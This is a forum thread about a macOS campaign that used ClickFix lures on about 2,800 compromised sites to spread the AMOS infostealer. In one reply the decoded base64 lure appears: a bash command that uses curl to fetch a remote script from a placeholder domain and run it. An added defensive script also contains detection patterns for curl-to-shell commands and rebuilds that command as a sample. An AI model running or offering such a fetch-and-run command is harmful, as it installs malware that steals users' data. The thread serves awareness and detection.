MacReaper - Have you heard about this?

Over 2,800 websites used to spread AMOS stealer malware - CyberGuy

I do think most would realize there was a problem once the malware required Terminal access. Unfortunately, some might not understand this, but if they don't, I can't imagine someone using Terminal who has limited skills.

I think that experienced Mac users would know better than to fall for this, and that inexperienced users would be too afraid of the Terminal to attempt it. I don't know who that leaves. It's hard to take this seriously. It almost sounds like an April Fools joke.

The site that you linked to is obviously run by Windows bigots who want us to believe that our Macs are just as insecure as their Windows POS's. They, too, are hard to take seriously.
 

Raz0rEdge

Quite interesting, that particular base64 string decodes to the following:
/bin/bash "$(curl -fsSL https://<bad domain>/2/perify.sh)"
So when you pipe that to the shell, it'll just execute that shell script.

The arguments to curl are fail fast, silent, show errors, and follow redirect links.
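
Added example (not part of the thread or of Raz0rEdge's post): one way to check what a pasted one-liner like the one described above would do, by decoding its base64 payload and inspecting the result instead of piping it to a shell. The `bad-domain.example` host, the `echo ... | base64 -d | bash` wrapper and the function names are assumptions made for this illustration.

```shell
#!/usr/bin/env bash
# Inspect a pasted one-liner WITHOUT executing it: decode any base64 it
# carries and check whether the result downloads code and hands it to a shell.

# Print the decoding of every base64-looking token (16+ chars) in $1, one per line.
decode_tokens() {
  printf '%s\n' "$1" | grep -oE '[A-Za-z0-9+/]{16,}={0,2}' |
  while IFS= read -r tok; do
    # --decode is accepted by GNU and macOS base64; non-printable bytes are
    # dropped so a mis-detected token cannot garble the terminal.
    printf '%s' "$tok" | base64 --decode 2>/dev/null | LC_ALL=C tr -cd '[:print:]'
    printf '\n'
  done
}

# Succeed when $1 fetches remote content and passes it to a shell, either as
# `curl ... | bash` or as `bash "$(curl ...)"` (the form quoted in the thread).
is_download_and_exec() {
  printf '%s\n' "$1" | grep -aEq \
    '(curl|wget)[^|;]*\|[[:space:]]*(ba|z)?sh([[:space:]]|$)|(ba|z)?sh[^|;]*\$\((curl|wget)'
}

# Print one of: clean, suspicious, suspicious-after-decoding.
verdict() {
  local decoded result=clean
  decoded=$(decode_tokens "$1")
  if is_download_and_exec "$1"; then result=suspicious; fi
  if is_download_and_exec "$decoded"; then result=suspicious-after-decoding; fi
  printf '%s\n' "$result"
}

# Constructed sample: the decoded command from the thread with a placeholder
# domain, inside an assumed "paste this into Terminal" wrapper.
sample_b64=$(printf '%s' \
  '/bin/bash "$(curl -fsSL https://bad-domain.example/2/perify.sh)"' |
  base64 | tr -d '\n')
sample="echo \"$sample_b64\" | base64 -d | bash"

printf 'pasted : %s\n' "$sample"
printf 'decoded: %s\n' "$(decode_tokens "$sample")"
printf 'verdict: %s\n' "$(verdict "$sample")"
```

The pasted text itself contains no `curl`, so it only gets flagged once the base64 token has been decoded, which is why a plain keyword search over the clipboard contents misses this lure.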
 

badbyte

> I think that experienced Mac users would know better than to fall for this, and that inexperienced users would be too afraid of the Terminal to attempt it. I don't know who that leaves. It's hard to take this seriously. It almost sounds like an April Fools joke.
>
> The site that you linked to is obviously run by Windows bigots who want us to believe that our Macs are just as insecure as their Windows POS's. They, too, are hard to take seriously.

Unfortunately, ClickFix has become a widely used delivery method, primarily for infostealers, since mid-2024. Its use has been significantly increasing for one key reason: it is effective.

I am the researcher who uncovered the approximately 2,800 compromised sites, and I can confirm that macOS is being widely targeted by infostealer malware. However, I acknowledge that Windows remains the number one targeted platform.

More of my research can be found here:
https://badbyte.io/infostealer-macos-etherhiding/
 

Rod


Good read, thank you.
 
